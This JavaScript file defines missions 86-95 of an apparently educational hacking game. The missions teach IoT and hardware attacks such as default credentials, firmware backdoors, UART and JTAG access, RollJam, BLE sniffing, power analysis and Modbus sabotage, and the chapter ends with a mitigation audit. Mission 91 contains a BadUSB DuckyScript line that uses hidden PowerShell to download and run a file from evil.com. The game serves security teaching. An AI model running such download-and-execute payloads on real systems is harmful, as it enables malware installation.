// Chapter 9: IoT & Hardware (Missions 86-95)
const mk=(id,n,l,t,c,b,o,i,co,fs,p,h,pk,sc,tr,ex={})=>({id,name:n,level:l,estimatedTime:t,unlockedCommands:c,briefing:`[HARDWARE LAB]\n\n${b}\n\n— Lab Tech`,objective:o,story:{intro:i,completion:co},filesystem:fs,initialPath:p,hints:h,progressKeys:pk,successCondition:sc,triggers:tr,...ex});

export const mission86=mk('mission86','Default Passwords',86,7,['ls','cd','cat','grep','analyze','help','clear','pwd','hint','status'],"IoT devices are participating in a massive DDoS botnet. Find out how they were compromised.","Find the vulnerability in the IoT devices","IoT botnet compromise.",
  "10,000 security cameras infected via default credentials (admin/admin) running Mirai variant.",
  {'iot':{'botnet.txt':`BOTNET ANALYSIS:\n\nType: Mirai variant\nSize: 10,000+ devices\nDevices: Smart IP Cameras (Brand X)\nAttack: 500Gbps SYN Flood against bank targets\n\nInfection method: Automated scanning on port 23 (Telnet)`,'creds.txt':`INFECTION VECTOR:\n\nAttacker script scans internet for port 23.\nAttempts login using hardcoded dictionary:\n  1. root / root\n  2. admin / admin ⚠️ SUCCESS\n  3. root / 12345\n  4. admin / 1234\n\nBrand X cameras ship with admin/admin.\nThey do NOT force users to change it on setup.\nThey leave Telnet open to WAN by default.\n\nResult: Device compromised 14 seconds after internet connection.`}},'/iot',["Check botnet analysis for device type.","Creds file shows the infection vector.","Default credentials are the root cause."],['foundBotnet','foundCreds'],(p)=>p.foundBotnet&&p.foundCreds,[{command:'cat',args:['botnet.txt'],progressUpdate:{foundBotnet:true},narrative:'📹 10,000 IP cameras compromised into a Mirai-style botnet! Launching 500Gbps DDoS.'},{command:'cat',args:['creds.txt'],progressUpdate:{foundCreds:true},narrative:'🔓 Root cause: Default admin/admin credentials + Telnet open to WAN. Compromised in 14 seconds!'}]);

export const mission87=mk('mission87','Firmware Extraction',87,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"Extract and analyze firmware from a smart lock. Find hardcoded credentials.","Extract hardcoded credentials from smart lock firmware","Smart lock firmware analysis.",
  "Found hardcoded backdoor password 'factory_unlock_123' in binwalk firmware extraction.",
  {'firmware':{'binwalk_log.txt':`BINWALK FIRMWARE EXTRACTION:\n\nDECIMAL       HEXADECIMAL     DESCRIPTION\n--------------------------------------------------------------\n0             0x0             uImage header\n64            0x40            LZMA compressed data\n1048576       0x100000        Squashfs filesystem ⚠️\n\nExtracted Squashfs filesystem to /_firmware.extracted/`,'squashfs':{'etc':{'shadow':`root:$1$O3J1...:15000:0:99999:7:::\nuser:$1$k2P3...:15000:0:99999:7:::`},'bin':{'unlock_agent.c':`SOURCE CODE RECOVERED:\n\nvoid handle_bluetooth_auth(char* input_key) {\n  char* master = "factory_unlock_123"; // ⚠️ BACKDOOR\n  \n  if(strcmp(input_key, master) == 0) {\n    trigger_motor_open();\n    return;\n  }\n  // Check normal user keys...\n}`}}}},'/firmware',["Read the binwalk log to see the filesystem was extracted.","Check the squashfs/bin folder for source code.","Hardcoded passwords are a massive flaw."],['extractedFS','foundBackdoor'],(p)=>p.extractedFS&&p.foundBackdoor,[{command:'cat',args:['binwalk_log.txt'],progressUpdate:{extractedFS:true},narrative:'🛠️ Firmware unpacked using binwalk. Squashfs filesystem extracted.'},{command:'cat',args:['squashfs/bin/unlock_agent.c'],progressUpdate:{foundBackdoor:true},narrative:'🚪 HARDCODED BACKDOOR! "factory_unlock_123" unlocks any smart lock via Bluetooth. Huge vulnerability!'}]);

export const mission88=mk('mission88','UART Console',88,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"Connect to a hardware UART debug port on a router board. Gain root shell.","Analyze hardware UART connection to get root shell","Hardware UART debug port.",
  "Connected to PCB serial pins (UART). Bootloader dropped to root shell without password.",
  {'hardware':{'board_photo.txt':`PCB ANALYSIS:\n\nIdentified 4 unpopulated pins near CPU:\nPin 1: Square pad (VCC 3.3v)\nPin 2: Round pad (TX)\nPin 3: Round pad (RX)\nPin 4: Round pad (GND)\n\nConnected USB-to-TTL serial adapter.\nSettings: 115200 baud, 8N1`,'serial_log.txt':`SERIAL CONSOLE OUTPUT:\n\nBooting Linux... \nStarting kernel...\nLoading drivers...\n\nWelcome to SmartRouter Pro v2.0\n\nHit any key to stop autoboot: 3.. 2.. 1.. 0\nBooting normal image...\n\nPress Enter to activate console...\n[ENTER pressed]\n\n# whoami\nroot\n# id\nuid=0(root) gid=0(root)\n\nNO AUTHENTICATION REQUIRED! ⚠️\nFull root access obtained via physical pins.`}},'/hardware',["Read board photo to identify the UART pins.","Read serial log to see what the pins connect to.","No authentication on serial consoles is common but dangerous."],['foundPins','gotRoot'],(p)=>p.foundPins&&p.gotRoot,[{command:'cat',args:['board_photo.txt'],progressUpdate:{foundPins:true},narrative:'🔌 UART pins identified and connected (TX, RX, GND) at 115200 baud.'},{command:'cat',args:['serial_log.txt'],progressUpdate:{gotRoot:true},narrative:'👑 Pressed Enter and dropped straight to a ROOT shell! No password needed. Hardware hacking success.'}]);

export const mission89=mk('mission89','JTAG Debugging',89,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"Use JTAG interface to halt CPU and dump memory, bypassing software security.","Use JTAG to dump memory and find encryption key","JTAG hardware debugging.",
  "JTAG halted CPU. Dumped SRAM memory containing AES encryption key in plaintext.",
  {'jtag':{'connection.txt':`JTAG INTERFACE:\n\nDiscovered standard 20-pin JTAG header.\nConnected JTAGulator tool.\nIdentified TRST, TDI, TMS, TCK, TDO pins.\n\nOpenOCD connected to target CPU (ARM Cortex-M4).\nVulnerable: CPU debug protection NOT locked (RDP=0).`,'openocd_log.txt':`OPENOCD COMMANDS:\n\n> halt\ntarget halted due to debug-request, current mode: Thread\nxPSR: 0x21000000 pc: 0x08001234 msp: 0x2000ffc0\n\n> dump_image sram_dump.bin 0x20000000 0x10000\ndumped 65536 bytes in 1.2 seconds\n\n> exit`,'memory_analysis.txt':`SRAM DUMP ANALYSIS:\n\nSearched memory dump for high-entropy strings.\nFound at 0x20004A20:\n\nAES-256 Symmetric Key:\n[ 4A 9C 11 F2 88 B3 D4 7A ... ]\n\nSecurity chip bypassed! Software locks are irrelevant\nbecause JTAG allows direct chip-level memory reading.`}},'/jtag',["Check connection to see if JTAG is locked.","OpenOCD halts the CPU and dumps SRAM.","Memory analysis finds the key."],['haltedCPU','dumpedKey'],(p)=>p.haltedCPU&&p.dumpedKey,[{command:'cat',args:['openocd_log.txt'],progressUpdate:{haltedCPU:true},narrative:'🛑 Sent JTAG halt command. CPU execution paused. Dumped 64KB of SRAM memory.'},{command:'cat',args:['memory_analysis.txt'],progressUpdate:{dumpedKey:true},narrative:'🔑 AES-256 key found in plaintext in SRAM! JTAG bypasses all software security.'}]);

export const mission90=mk('mission90','Radio Replay',90,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"A car was stolen using a Software Defined Radio (SDR). Analyze the RF signals.","Analyze RF replay attack on car key fob","Keyless entry RF replay.",
  "Captured 433MHz rolling code from key fob. Attacker jammed signal, stored code, and replayed it.",
  {'sdr':{'rf_capture.txt':`SDR CAPTURE LOG:\n\nFrequency: 433.92 MHz\nModulation: ASK (Amplitude Shift Keying)\n\nSignal 1 (14:02:10): 0110100110... (Rolling Code A)\nSignal 2 (14:02:11): 0110100111... (Rolling Code B)\n\nWhy did the victim press the button twice?`,'attack_analysis.txt':`ROLL CODE ROLLJAM ATTACK:\n\n1. Victim presses unlock. Sends Code A.\n2. Attacker JAMS the car receiver, but CAPTURES Code A.\n3. Car doesn't unlock.\n4. Victim presses unlock again. Sends Code B.\n5. Attacker JAMS again, CAPTURES Code B, but immediately REPLAYS Code A.\n6. Car receives Code A and unlocks!\n7. Victim drives away, unaware.\n\nNow attacker holds Code B (unused, valid!).\n\n8. That night, attacker REPLAYS Code B.\n9. Car unlocks. Car stolen.`}},'/sdr',["Read RF capture to see the frequency and signals.","Attack analysis explains the RollJam technique.","Rolling codes are vulnerable if jammers are used."],['readCapture','understoodRollJam'],(p)=>p.readCapture&&p.understoodRollJam,[{command:'cat',args:['rf_capture.txt'],progressUpdate:{readCapture:true},narrative:'📻 SDR captured 433MHz ASK signals. Victim pressed the key fob twice.'},{command:'cat',args:['attack_analysis.txt'],progressUpdate:{understoodRollJam:true},narrative:'🚗 RollJam attack! Attacker jammed signal, saved Code A and B, replayed A. Left with an unused, valid Code B to steal the car later!'}]);

export const mission91=mk('mission91','BadUSB',91,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"An employee found a USB drive in the parking lot and plugged it in. Analyze the payload.","Analyze BadUSB HID payload","Malicious USB drive dropped.",
  "USB acts as a keyboard (HID), typing malicious PowerShell commands in milliseconds.",
  {'badusb':{'device_info.txt':`USB DEVICE FORENSICS:\n\nPhysical appearance: SanDisk 16GB Flash Drive\nActual chip: Arduino Microcontroller (ATmega32u4)\n\nUSB Descriptor:\n  Vendor ID: 0x046D (Spoofed as Logitech)\n  Product ID: 0xC31C (Spoofed as Keyboard)\n  Device Class: HID (Human Interface Device)\n\nIt is NOT a storage drive. It is a fake keyboard!`,'payload_script.txt':`DUCKYSCRIPT PAYLOAD:\n\nDELAY 1000\nGUI r\nDELAY 200\nSTRING powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://evil.com/payload.exe -OutFile C:\\payload.exe; Start-Process C:\\payload.exe"\nENTER\n\nExecution time: 0.5 seconds\n\nBefore the employee even realizes what's happening,\nthe "keyboard" opens Run, types the command, and executes.`}},'/badusb',["Check device info — it's not a real flash drive.","It identifies as a Logitech keyboard (HID).","The payload types commands instantly."],['foundSpoof','analyzedPayload'],(p)=>p.foundSpoof&&p.analyzedPayload,[{command:'cat',args:['device_info.txt'],progressUpdate:{foundSpoof:true},narrative:'⌨️ It\'s not a flash drive! It\'s a microcontroller spoofing a Logitech keyboard.'},{command:'cat',args:['payload_script.txt'],progressUpdate:{analyzedPayload:true},narrative:'⚡ BadUSB typed a PowerShell download+execute payload in 0.5 seconds! Never plug in random USBs!'}]);

export const mission92=mk('mission92','BLE Sniffing',92,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"Medical device telemetry was intercepted. Analyze Bluetooth Low Energy (BLE) capture.","Analyze BLE packets to find unencrypted medical data","Bluetooth LE packet sniffing.",
  "Blood glucose monitor broadcasts sensitive health data in plaintext unencrypted BLE packets.",
  {'ble':{'wireshark_capture.txt':`BLE INTERCEPT (Ubertooth One):\n\nMAC: 11:22:33:44:55:66 (Target Device)\nService UUID: 1808 (Glucose Profile)\nCharacteristic: 2A18 (Glucose Measurement)\n\nPacket 42: READ RESPONSE\nData (hex): 0B 00 00 E2 07 04 0C 0F 1E 20 00 00 55 00\n\nNo pairing required. No encryption. BLE Just Works mode.`,'data_decoded.txt':`DECODED BLE DATA:\n\n0B = Flags\n00 00 = SEQUENCE NUMBER\nE2 07 04 0C = DATE: 2024-04-12\n0F 1E 20 = TIME: 15:30:32\n55 00 = GLUCOSE LEVEL: 85 mg/dL\n\nImpact:\nAnyone within 50 meters can read the patient's\nreal-time blood glucose data without pairing.\nMajor HIPAA violation.`}},'/ble',["Check capture for the BLE service UUIDs.","No pairing or encryption was used.","Data decoded shows sensitive health indicators."],['readCapture','foundHIPAA'],(p)=>p.readCapture&&p.foundHIPAA,[{command:'cat',args:['wireshark_capture.txt'],progressUpdate:{readCapture:true},narrative:'📡 Intercepted BLE traffic. Device uses "Just Works" mode — zero encryption.'},{command:'cat',args:['data_decoded.txt'],progressUpdate:{foundHIPAA:true},narrative:'🩸 Glucose monitor broadcasts real-time health data in plaintext. Massive HIPAA violation!'}]);

export const mission93=mk('mission93','Side Channel',93,9,['ls','cd','cat','grep','analyze','help','clear','pwd','hint','status'],"A secure smart card was cloned using power analysis. Understand the side-channel attack.","Analyze Simple Power Analysis (SPA) on a smart card","Side-channel power attack.",
  "Power consumption graph reveals bits of the RSA key. High power = bit 1, Low power = bit 0.",
  {'sidechannel':{'oscilloscope.txt':`POWER TRACE CAPTURE:\n\nMeasured power consumption of the smartcard chip\nduring RSA signed operation.\n\nGraph pattern during exponentiation loop:\nTime 10ms: High power spike (duration 2ms)\nTime 13ms: Low power spike (duration 1ms)\nTime 15ms: High power spike (duration 2ms)\nTime 18ms: High power spike (duration 2ms)\nTime 21ms: Low power spike (duration 1ms)`,'spa_analysis.txt':`SIMPLE POWER ANALYSIS (SPA):\n\nRSA uses "Square-and-Multiply" algorithm.\n\nIf bit = 1: Chip performs Square AND Multiply (uses more power, takes longer)\nIf bit = 0: Chip performs ONLY Square (uses less power, faster)\n\nMapping the trace:\nHigh(2ms) = 1\nLow(1ms)  = 0\nHigh(2ms) = 1\nHigh(2ms) = 1\nLow(1ms)  = 0\n\nRecovered Key Bits: 10110...\nWe literally read the private key by watching the electricity!`}},'/sidechannel',["Check oscilloscope text for power spikes.","SPA analysis explains square-and-multiply.","Electricity fluctuations leak the exact bits of the RSA key."],['readPower','extractedKey'],(p)=>p.readPower&&p.extractedKey,[{command:'cat',args:['oscilloscope.txt'],progressUpdate:{readPower:true},narrative:'⚡ Capturing smartcard power consumption via oscilloscope during RSA signing.'},{command:'cat',args:['spa_analysis.txt'],progressUpdate:{extractedKey:true},narrative:'📉 Simple Power Analysis: Square-and-multiply algorithm leaks bits! High power=1, Low power=0. RSA key extracted via electricity!'}]);

export const mission94=mk('mission94','Network Impinger',94,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"Industrial Control System (ICS) in a factory was sabotaged. Analyze the SCADA logs.","Analyze SCADA logs to find ICS sabotage","ICS/SCADA factory sabotage.",
  "Modbus TCP commands injected to disable cooling pumps. PLC logic overwritten.",
  {'ics':{'scada_logs.txt':`MODBUS TCP LOGS:\n\n14:00 - Master(10.0.0.5) to Slave(10.0.0.20/PLC-Cooling)\n  Function Code 03 (Read Holding Registers) - Normal\n\n14:30 - UNKNOWN(10.0.0.99) to Slave(10.0.0.20)\n  Function Code 06 (Write Single Register) ⚠️\n  Address: 0x4001 (Cooling Pump State)\n  Value: 0x0000 (OFF)\n\n14:31 - UNKNOWN(10.0.0.99) to Slave(10.0.0.20)\n  Function Code 06 (Write Single Register)\n  Address: 0x4005 (Alarm Threshold)\n  Value: 0x9999 (Max - Disables Alarm) ⚠️`,'impact.txt':`PHYSICAL IMPACT:\n\n1. Cooling pumps disabled via unauthenticated Modbus write.\n2. Alarms threshold set to maximum (silenced).\n3. Factory reactor overheated by 300 degrees.\n4. Physical safety valve blew, halting production.\n\nFlaws:\n- Modbus TCP has NO authentication\n- PLC accessible from corporate network (flat network)\n- No IDS for industrial protocols`}},'/ics',["Modbus logs show unauthenticated writes to the PLC.","Pumps turned off, alarms silenced.","Impact shows real physical damage."],['foundModbus','assessedDamage'],(p)=>p.foundModbus&&p.assessedDamage,[{command:'cat',args:['scada_logs.txt'],progressUpdate:{foundModbus:true},narrative:'🏭 Rogue IP sent Modbus Write commands to the PLC! Turned off cooling pumps and silenced alarms.'},{command:'cat',args:['impact.txt'],progressUpdate:{assessedDamage:true},narrative:'🔥 Physical damage achieved: reactor overheated, safety valve blew. Modbus has zero authentication!'}]);

export const mission95=mk('mission95','Hardware Audit',95,7,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"Review a consolidated hardware/IoT security audit report to finalize the chapter.","Review hardware and IoT security audit report","Final hardware security audit.",
  "Audit complete. Hardware flaws summarized: JTAG, UART, BadUSB, BLE, and default credentials.",
  {'audit':{'summary.txt':`HARDWARE/IOT SEC AUDIT SUMMARY\n\nFindings:\n1. Open UART/JTAG debug ports left on production boards\n2. Default credentials on connected devices\n3. Unencrypted BLE/RF communications\n4. Lack of hardware root of trust (Secure Boot)\n5. Flat networks mixing IT and OT(SCADA)\n\nHardware hacking bridges the cyber-physical gap.`,'improvements.txt':`REQUIRED IMPROVEMENTS:\n\n- Burn eFuses to disable JTAG/UART in production\n- Enforce unique device passwords at manufacturing\n- Require BLE pairing and encryption\n- Implement network segmentation (Purdue Model for ICS)\n- Pot hardware chips in epoxy to prevent physical probing`}},'/audit',["Review summary for all findings.","Review improvements for next steps."],['reviewedSummary','reviewedImprovs'],(p)=>p.reviewedSummary&&p.reviewedImprovs,[{command:'cat',args:['summary.txt'],progressUpdate:{reviewedSummary:true},narrative:'📋 Hardware/IoT audit summary reviewed. Physical access is total access.'},{command:'cat',args:['improvements.txt'],progressUpdate:{reviewedImprovs:true},narrative:'✅ Hardware Chapter complete. Time to face the Syndicate Boss.'}]);

export const chapter9Missions=[mission86,mission87,mission88,mission89,mission90,mission91,mission92,mission93,mission94,mission95];
